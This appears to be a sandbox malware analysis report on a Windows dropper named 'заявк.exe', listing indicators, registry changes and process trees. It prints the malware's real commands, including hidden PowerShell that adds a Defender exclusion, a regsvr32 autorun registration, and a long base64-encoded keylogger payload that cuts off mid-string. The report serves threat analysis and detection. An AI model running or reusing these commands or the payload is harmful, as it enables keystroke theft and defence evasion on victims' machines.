05afe90ae232227678223fd9c733567c7af155856284224e0e606fa634c42426

Analysis

max time kernel
160s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
07-08-2023 06:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

заявк.exe
Size

380KB
MD5

cc159da1d464234347c4d9e7c0c8ee4c
SHA1

fc2d07d3c0081e3ac1588796bb78abaefa43fb16
SHA256

0455097f6c81a896542bc23f0d96c0193f15973af30ae70658c64d523adbab64
SHA512

6386f807ffc2cdb67744821af2c4ac903997285ac3f2ac68de984a0a7654e32ec946bafd9e7721de1d00f2692b013f05be079609e938f0aafb8de5194c7c17cb
SSDEEP

6144:LOYGXaPNxdgSdcq2pVZPOJHAbKWeW0vZE0zY0xGmdF9/YBk5T:fGqN/XdctpVtkml0vaX03/ikp

Score

10^/10

persistence

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3228	1996	wscript.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2924	1996	powershell.exe	89

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	3228	wscript.exe

Loads dropped DLL 1 IoCs

pid	Process
2312	regsvr32.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\dynwrapx.dll"	regsvr32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 12 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\DynamicWrapperX	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\WOW6432Node	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\WOW6432Node\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1984	powershell.exe
2380	powershell.exe
1984	powershell.exe
2380	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1668	wscript.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2924	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 3296 wrote to memory of 5084	3296	заявк.exe	80
PID 3296 wrote to memory of 5084	3296	заявк.exe	80
PID 3296 wrote to memory of 5084	3296	заявк.exe	80
PID 5084 wrote to memory of 2380	5084	cmd.exe	83
PID 5084 wrote to memory of 2380	5084	cmd.exe	83
PID 5084 wrote to memory of 2380	5084	cmd.exe	83
PID 5084 wrote to memory of 1668	5084	cmd.exe	85
PID 5084 wrote to memory of 1668	5084	cmd.exe	85
PID 5084 wrote to memory of 1668	5084	cmd.exe	85
PID 1668 wrote to memory of 1984	1668	wscript.exe	88
PID 1668 wrote to memory of 1984	1668	wscript.exe	88
PID 1668 wrote to memory of 1984	1668	wscript.exe	88
PID 1668 wrote to memory of 2312	1668	wscript.exe	91
PID 1668 wrote to memory of 2312	1668	wscript.exe	91
PID 1668 wrote to memory of 2312	1668	wscript.exe	91
PID 2924 wrote to memory of 1700	2924	powershell.exe	94
PID 2924 wrote to memory of 1700	2924	powershell.exe	94
PID 1700 wrote to memory of 1704	1700	csc.exe	95
PID 1700 wrote to memory of 1704	1700	csc.exe	95

C:\Users\Admin\AppData\Local\Temp\заявк.exe
"C:\Users\Admin\AppData\Local\Temp\заявк.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3296
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 445113777 239 "C:\Users\Admin\AppData\Local\Temp\заявк.exe")
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2380
- - C:\Windows\SysWOW64\wscript.exe
    wscript.exe /E:jscript 445113777 239 "C:\Users\Admin\AppData\Local\Temp\заявк.exe"
    3⤵
    - Modifies registry class
    - Suspicious behavior: RenamesItself
    - Suspicious use of WriteProcessMemory
    PID:1668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1984
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"
      4⤵
      Loads dropped DLL
      Registers COM server for autorun
      Modifies registry class
      PID:2312

C:\Windows\SysWOW64\wscript.exe
C:\Windows\SysWOW64\wscript.exe "C:\Users\Admin\AppData\Local\a580142d0.js" 239
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
PID:3228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGMAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABtADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABwADMAIABoADQAIAA9ACAAaAA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcAA2ACAAZQA3ACAAPQAgAGsAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAbwA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABiADEAMAAgAGcAMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGUAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGgAMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGMAMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGgAMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABkADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGcAMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABhADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGcAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABnADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAaQAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABvADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGEAMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGUAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAG4AMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGgAMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGYAMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABwADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGIAMQAwACAAcAAzADUAKQB7AGcAMQAxACAAPQAgAHAAMwA1ADsAZgAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AHAAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AGcAMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAHAAMQA5ADsAbAAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAaABlAHgAOAA7ACIAKQA7AGkAZgAgACgAbAAyADYAIAA9AD0AIABuAHUAbABsACkAIABsADIANgAgAD0AIAAiADEAMgAzADQANQA2ADcAOAAiADsAYQAyADEAIAA9ACAAbAAyADYAIAArACAAIgBhACIAOwBwADIAMgAgAD0AIABsADIANgAgACsAIAAiAGQAIgA7AGcAMgAzACAAPQAgAGwAMgA2ACAAKwAgACIAcwAiADsAZwAyADQAIAA9ACAAbAAyADYAIAArACAAIgBtACIAOwB1AGkAbgB0ACAAawAzADYAIAA9ACAATwBwAGUAbgBNAHUAdABlAHgAKAAwAHgAMAAwADEAMAAwADAAMAAwACwAIABmAGEAbABzAGUALAAgAGcAMgA0ACkAOwBpAGYAIAAoAGsAMwA2ACAAIQA9ACAAMAApACAARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAB0AHIAdQBlACwAIABnADIANAApADsAbwAyADcAIAA9ACAASQBuAHQAUAB0AHIALgBaAGUAcgBvADsAaQBmACAAKABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoADIALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABvAHUAdAAgAG8AMgA3ACkAIAAhAD0AIAAwACkAIABvADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBkADEAOAAgAD0AIAAiACIAOwBoADEAMwAgAD0AIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGgAMQAzACkAOwBoADEANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAaAAxADMALAAgAGgAMQA2ACwAIABtADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAYwAxADQAIAA9ACAAMAA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAaAAxADMALAAgAHIAZQBmACAAYwAxADQAKQA7AFAAcgBvAGMAZQBzAHMAIABnADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGMAMQA0ACkAOwBpAGYAIAAoAGcAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAaQAyADUAIAA9ACAAZwAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABpADIANQAgAD0AIAAiACIAOwBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAAZQA3ACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgADAALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApADsAbwA5ACAAPQAgAG8AMwA5ACgAaAA0ACkAOwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBSAHUAbgAoACkAOwBVAG4AaABvAG8AawBXAGkAbgBkAG8AdwBzAEgAbwBvAGsARQB4ACgAbwA5ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAbwAzADkAKABwADMAIABoADQAKQB7AEkAbgB0AFAAdAByACAAYwA0ADAAIAA9ACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACkAOwByAGUAdAB1AHIAbgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKAAxADMALAAgAGgANAAsACAAYwA0ADAALAAgADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdgBvAGkAZAAgAGYANAAxACgAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAG8ANAAyACwAIABzAHQAcgBpAG4AZwAgAGIANAAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAcAA0ADQAKQB7AHQAcgB5AHsAcwB0AHIAaQBuAGcAIABvADQANQBkAGEAdABhAF8AIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4ARwBlAHQAVgBhAGwAdQBlACgAZwAyADAALAAgAGEAMgAxACwAIAAiACIAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwBvADQANQBkAGEAdABhAF8AIAA9ACAAbwA0ADUAZABhAHQAYQBfACAAKwAgAEQAYQB0AGUAVABpAG0AZQAuAE4AbwB3ACAAKwAgACIAIABbACIAIAArACAAbwA0ADIALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXQAgAC0AIAAiACAAKwAgAGIANAAzACAAKwAgACIAXAByAFwAbgAiACAAKwAgAHAANAA0AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAFwAcgBcAG4AXAByAFwAbgAiADsAUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAZwAyADAALAAgAGEAMgAxACwAIABvADQANQBkAGEAdABhAF8AKQA7AH0AYwBhAHQAYwBoACAAewAgAH0AfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpAG4AdAAgAGUANAA2ACgASQBuAHQAUAB0AHIAIABhADQANwApAHsAcgBlAHQAdQByAG4AIABNAGEAcgBzAGgAYQBsAC4AUgBlAGEAZABJAG4AdAAzADIAKABhADQANwApADsAfQBwAHIAaQB2AGEAdABlACAAZABlAGwAZQBnAGEAdABlACAASQBuAHQAUAB0AHIAIABwADMAKABpAG4AdAAgAGsANAA4ACwAIABJAG4AdABQAHQAcgAgAGgANAA5ACwAIABJAG4AdABQAHQAcgAgAGwANQAwACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHUAaQBuAHQAIABwADYAKABJAG4AdABQAHQAcgAgAHAAUABhAHIAYQBtACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHYAbwBpAGQAIABiADEAMAAoACkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABJAG4AdABQAHQAcgAgAGgANQAoAGkAbgB0ACAAawA0ADgALAAgAEkAbgB0AFAAdAByACAAaAA0ADkALAAgAEkAbgB0AFAAdAByACAAbAA1ADAAKQB7AGkAZgAgACgAawA0ADgAIAA+AD0AIAAwACAAJgAmACAAaAA0ADkAIAA9AD0AIAAoAEkAbgB0AFAAdAByACkAMAB4ADAAMQAwADAAKQB7AGkAbgB0ACAAbQA1ADEAIAA9ACAAZQA0ADYAKABsADUAMAApADsAaQBmACAAKABtADUAMQAgADwAIAA4ACkAIAByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAG8AOQAsACAAawA0ADgALAAgAGgANAA5ACwAIABsADUAMAApADsAZwAxADEAKAApADsAYgBvAG8AbAAgAG0ANQAyACAAPQAgACgAbQA1ADEAIAA9AD0AIAA4ACkAOwBiAG8AbwBsACAAaQA1ADMAIAA9ACAAKABtADUAMQAgAD0APQAgADQANgApADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGcANQA0ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwBiAHkAdABlAFsAXQAgAGMANQA1ACAAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAMgA1ADUAXQA7AGkAZgAgACgARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGMANQA1ACkAKQB7AHUAaQBuAHQAIABsADUANgAgAD0AIABNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAbQA1ADEALAAgADMAKQA7AGUAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAdQBpAG4AdAAgAGsANQA3ACAAPQAgADAAOwB1AGkAbgB0ACAAZQA1ADgAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABlADEAMgAsACAAcgBlAGYAIABrADUANwApADsAdQBpAG4AdAAgAGsANQA5ACAAPQAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABMAGEAeQBvAHUAdAAoAGUANQA4ACkAOwBpAGYAIAAoAG0ANQAyACAAfAB8ACAAaQA1ADMAIAB8AHwAIAAoAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAG0ANQAxACwAIABsADUANgAsACAAYwA1ADUALAAgAGcANQA0ACwAIABnADUANAAuAEMAYQBwAGEAYwBpAHQAeQAsACAAKAB1AGkAbgB0ACkAMAAsACAAawA1ADkAKQAgAD4AIAAwACkAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGUAMQAyACkAOwBmADEANQAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAZQAxADIALAAgAGYAMQA1ACwAIABtADMANwAgACsAIAAxACkAOwBpAGYAIAAoACgAawA1ADcAIAAhAD0AIABjADEANAApACAAfAB8ACAAKABlADEAMgAgACEAPQAgAGgAMQAzACkAIAB8AHwAIAAoAGgAMQA2AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACEAPQAgAGYAMQA1AC4AVABvAFMAdAByAGkAbgBnACgAKQApACkAewBmADQAMQAoAGgAMQA2ACwAIABpADIANQAsACAAZgAxADcAKQA7AGgAMQA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABoADEANgAuAEwAZQBuAGcAdABoACkAOwBoADEANgAuAEEAcABwAGUAbgBkACgAZgAxADUAKQA7AGYAMQA3AC4AUgBlAG0AbwB2AGUAKAAwACwAIABmADEANwAuAEwAZQBuAGcAdABoACkAOwBoADEAMwAgAD0AIABlADEAMgA7AFAAcgBvAGMAZQBzAHMAIABnADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGsANQA3ACkAOwBpAGYAIAAoAGcAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAaQAyADUAIAA9ACAAZwAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABpADIANQAgAD0AIAAiACIAOwBjADEANAAgAD0AIABrADUANwA7AH0AaQBmACAAKABtADUAMQAgAD4AIAA3ACkAewBpAGYAIAAoAG0ANQAyACkAIABmADEANwAuAEEAcABwAGUAbgBkACgAIgBbAKsAXQAiACkAOwBlAGwAcwBlACAAaQBmACAAKABpADUAMwApACAAZgAxADcALgBBAHAAcABlAG4AZAAoACIAWwBkAGUAbABdACIAKQA7AGUAbABzAGUAIABmADEANwAuAEEAcABwAGUAbgBkACgAZwA1ADQAKQA7AH0AfQB9AH0AcgBlAHQAdQByAG4AIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABvADkALAAgAGsANAA4ACwAIABoADQAOQAsACAAbAA1ADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABiADYAMAAoAGIAeQB0AGUAWwBdACAAbAA2ADEAKQB7AHMAdAByAGkAbgBnACAAZAA2ADIAIAA9ACAARQBuAGMAbwBkAGkAbgBnAC4AQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABsADYAMQApADsAaQBmACAAKABzAHQAcgBpAG4AZwAuAEkAcwBOAHUAbABsAE8AcgBFAG0AcAB0AHkAKABkADYAMgApACkAIAByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKAApADsAcgBlAHQAdQByAG4AIABuAGUAdwAgAEwAaQBzAHQAPABzAHQAcgBpAG4AZwA+ACgAZAA2ADIALgBTAHAAbABpAHQAKABuAGUAdwAgAGMAaABhAHIAWwBdACAAewAgACcAXAAwACcAIAB9ACwAIABTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwAuAFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGsAOAAoAEkAbgB0AFAAdAByACAAagA2ADMAKQB7AGIAbwBvAGwAIABrADYANAAgAD0AIAB0AHIAdQBlADsAcwB0AHIAaQBuAGcAIABuADYANQA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABqADYANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAdwBoAGkAbABlACAAKABrADYANAApAHsAcwB0AHIAaQBuAGcAIABjADYANwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABnADIAMAAsACAAZwAyADMALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGkAZgAgACgAYwA2ADcAIAAhAD0AIAAiACIAKQB7AFIAZQBnAGkAcwB0AHIAeQBLAGUAeQAgAGMANgA4ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAuAE8AcABlAG4AUwB1AGIASwBlAHkAKABwADEAOQAsACAAdAByAHUAZQApADsAaQBmACAAKABjADYAOAAgACEAPQAgAG4AdQBsAGwAKQB7AGMANgA4AC4ARABlAGwAZQB0AGUAVgBhAGwAdQBlACgAZwAyADMAKQA7AGMANgA4AC4AQwBsAG8AcwBlACgAKQA7AH0ARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAfQBpAGYAIAAoAEMAbABpAHAAYgBvAGEAcgBkAC4AQwBvAG4AdABhAGkAbgBzAFQAZQB4AHQAKAApACAAPQA9ACAAdAByAHUAZQApAHsAbgA2ADUAIAA9ACAAQwBsAGkAcABiAG8AYQByAGQALgBHAGUAdABUAGUAeAB0ACgAKQA7AGkA